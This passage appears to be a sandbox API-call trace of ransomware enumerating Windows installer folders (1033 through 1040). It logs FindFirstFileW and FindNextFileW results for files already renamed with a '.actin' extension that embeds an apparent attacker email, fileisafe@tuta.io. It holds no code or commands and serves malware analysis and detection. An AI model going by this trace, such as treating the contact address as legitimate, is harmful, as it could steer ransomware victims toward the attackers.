ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.110] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cc716cf, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cc716cf, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cc716cf, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x23a2, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="EULART~1.ACT")) returned 1 [0140.110] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cc716cf, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cc716cf, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cc978dd, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x15212, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="LOCALI~1.ACT")) returned 1 [0140.110] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cc978dd, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cc978dd, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cead9d5, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4c62, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 1 [0140.110] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cc978dd, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cc978dd, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cead9d5, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4c62, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 0 [0140.110] FindClose (in: hFindFile=0xaa9450 | out: hFindFile=0xaa9450) returned 1 [0140.111] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x3110098 | out: hHeap=0x26a0000) returned 1 [0140.111] FindNextFileW (in: hFindFile=0xaa91d0, lpFindFileData=0x306f618 | out: lpFindFileData=0x306f618*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="1033", cAlternateFileName="")) returned 1 [0140.111] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\*", lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xaa9610 [0140.113] FindNextFileW (in: hFindFile=0xaa9610, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.113] FindNextFileW (in: hFindFile=0xaa9610, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ccbdb32, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7ccbdb32, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7ccbdb32, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0xd72, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="EULART~1.ACT")) returned 1 [0140.113] FindNextFileW (in: hFindFile=0xaa9610, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ccbdb32, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7ccbdb32, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cef9e69, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x12ec2, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="LOCALI~1.ACT")) returned 1 [0140.113] FindNextFileW (in: hFindFile=0xaa9610, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cead9d5, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cead9d5, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cead9d5, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4462, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 1 [0140.114] FindNextFileW (in: hFindFile=0xaa9610, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cead9d5, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cead9d5, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cead9d5, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4462, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 0 [0140.114] FindClose (in: hFindFile=0xaa9610 | out: hFindFile=0xaa9610) returned 1 [0140.114] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x3110098 | out: hHeap=0x26a0000) returned 1 [0140.115] FindNextFileW (in: hFindFile=0xaa91d0, lpFindFileData=0x306f618 | out: lpFindFileData=0x306f618*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="1035", cAlternateFileName="")) returned 1 [0140.115] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\*", lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xaa9610 [0140.117] FindNextFileW (in: hFindFile=0xaa9610, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.117] FindNextFileW (in: hFindFile=0xaa9610, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cead9d5, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cead9d5, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7ced396f, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0xf72, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="EULART~1.ACT")) returned 1 [0140.117] FindNextFileW (in: hFindFile=0xaa9610, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ced396f, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7ced396f, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7ced396f, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x12de2, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="LOCALI~1.ACT")) returned 1 [0140.117] FindNextFileW (in: hFindFile=0xaa9610, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ced396f, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7ced396f, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7ced396f, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4862, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 1 [0140.117] FindNextFileW (in: hFindFile=0xaa9610, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ced396f, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7ced396f, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7ced396f, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4862, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 0 [0140.117] FindClose (in: hFindFile=0xaa9610 | out: hFindFile=0xaa9610) returned 1 [0140.118] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x3110098 | out: hHeap=0x26a0000) returned 1 [0140.118] FindNextFileW (in: hFindFile=0xaa91d0, lpFindFileData=0x306f618 | out: lpFindFileData=0x306f618*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="1036", cAlternateFileName="")) returned 1 [0140.118] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\*", lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xaa9450 [0140.120] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.121] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cef9e69, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cef9e69, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cef9e69, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0xec2, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="EULART~1.ACT")) returned 1 [0140.121] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cef9e69, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cef9e69, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7d077395, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x14522, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="LOCALI~1.ACT")) returned 1 [0140.121] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cf2007e, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cf2007e, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cf2007e, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4a62, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 1 [0140.121] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cf2007e, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cf2007e, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cf2007e, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4a62, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 0 [0140.121] FindClose (in: hFindFile=0xaa9450 | out: hFindFile=0xaa9450) returned 1 [0140.122] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x3110098 | out: hHeap=0x26a0000) returned 1 [0140.122] FindNextFileW (in: hFindFile=0xaa91d0, lpFindFileData=0x306f618 | out: lpFindFileData=0x306f618*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="1037", cAlternateFileName="")) returned 1 [0140.122] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\*", lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xaa9450 [0140.124] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.124] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cf2007e, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cf2007e, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cf2007e, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x1bc2, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="EULART~1.ACT")) returned 1 [0140.124] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cf460aa, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cf460aa, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cf460aa, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x11a92, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="LOCALI~1.ACT")) returned 1 [0140.124] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cf460aa, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cf460aa, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cf460aa, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4262, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 1 [0140.124] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cf460aa, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cf460aa, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7cf460aa, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4262, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 0 [0140.124] FindClose (in: hFindFile=0xaa9450 | out: hFindFile=0xaa9450) returned 1 [0140.125] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x3110098 | out: hHeap=0x26a0000) returned 1 [0140.125] FindNextFileW (in: hFindFile=0xaa91d0, lpFindFileData=0x306f618 | out: lpFindFileData=0x306f618*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="1038", cAlternateFileName="")) returned 1 [0140.126] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\*", lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xaa9450 [0140.127] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.127] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cf460aa, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7cf460aa, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7d15c4a5, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x1192, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="EULART~1.ACT")) returned 1 [0140.127] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d077395, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7d077395, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7d09d5ec, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x152b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="LOCALI~1.ACT")) returned 1 [0140.127] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d09d5ec, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7d09d5ec, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7d09d5ec, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4a62, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 1 [0140.127] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d09d5ec, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7d09d5ec, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7d09d5ec, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x4a62, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPR~1.ACT")) returned 0 [0140.128] FindClose (in: hFindFile=0xaa9450 | out: hFindFile=0xaa9450) returned 1 [0140.128] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x3110098 | out: hHeap=0x26a0000) returned 1 [0140.129] FindNextFileW (in: hFindFile=0xaa91d0, lpFindFileData=0x306f618 | out: lpFindFileData=0x306f618*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x430054, dwReserved1=0x7e0055, cFileName="1040", cAlternateFileName="")) returned 1 [0140.129] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\*", lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xaa9450 [0140.401] FindNextFileW (in: hFindFile=0xaa9450, lpFindFileData=0x306f394 | out: lpFindFileData=0x306f394*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, 